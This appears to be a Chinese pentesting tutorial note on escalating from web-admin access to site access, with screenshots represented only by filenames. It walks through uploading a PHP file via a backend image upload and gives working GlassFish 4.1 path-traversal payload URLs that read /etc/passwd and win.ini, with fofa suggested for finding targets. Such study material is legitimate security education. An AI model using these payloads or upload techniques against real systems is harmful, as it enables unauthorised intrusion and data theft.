权限提升-网站权限后台漏洞第三方获取

QQ截图20220420091932.jpg

需要掌握的权限理论

后台权限

  • 获得方式:爆破,注入猜解,弱QQ截图20220420100450.jpg口令等获取的帐号密码配合登录
  • 一般网站或应用后台只能操作应用的界面内容数据图片等信息,无法操作程序的源代码或服务器上的资源文件的。(如后台功能存在文件操作的话也可以操作文件数据)

网站权限

  • 查看或修改程序源代码,可以进行网站或应用的配置文件读取(接口配置信息,数据库配置信息等),还能收集服务器操作系统相关的信息,为后续系统提权做准备。
  • 数据库权限:操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。

接口权限

  • 邮件,短信,支付,第三方登录等

某挂壁程序后台权限提升-后台功能

QQ截图20220420095700.jpg

QQ截图20220420100429.jpg

进入后台

QQ截图20220420100450.jpg

源代码搜索文件上传的函数upload

QQ截图20220420100525.jpg

配合业务功能进行抓包测试(在栏目发布这里发现上传图片的地方)

QQ截图20220420100550.jpg

上传图片后抓包

QQ截图20220420100822.jpg

查看源代码是一个数据库的查询语句

QQ截图20220420100904.jpg

查看post的数据包,发现了文件上传的数据包

QQ截图20220420100925.jpg

查看源代码(获取到上传的路径,文件名的更改,这里只改变了文件名,没有改变文件类型,而文件名的命名是以时间来命名的)

QQ截图20220420100958.jpg

找到upload的文件夹,发现了上传的文件

QQ截图20220420101014.jpg

上传php文件,上传成功

QQ截图20220420101048.jpg

QQ截图20220420101055.jpg

业务功能点测试漏洞,发现在模板中心也可以上传文件

QQ截图20220420101134.jpg

总结从后台获取权限的思路

  1. 如果知道是CMS的程序,可以下载源代码,并且在网上搜已知漏洞(CMS程序的识别:页面的页脚,网站上的CMS识别,关键url,进入管理员后台(有些页脚隐藏了CMS))
  2. 查看后台的功能,如内容的发布可能会有文件上传漏洞,头像更改,模板管理可以直接上传文件,或者写入代码,后台文件的读取,SQL的执行,网站的备份,敏感文件的读取,组合其它漏洞进行利用(功能越多,成功的几率越大)

GlassFish中间件任意文件读取

fofa搜索GlassFish中间件的ip(GlassFish 4.1版本,注意为windows)

QQ截图20220420101519.jpg

网上搜相关中间件的漏洞

QQ截图20220420101541.jpg

  • 构造payload:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
  • 修改payload访问windows的文件: http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

QQ截图20220420101626.jpg

QQ截图20220420101638.jpg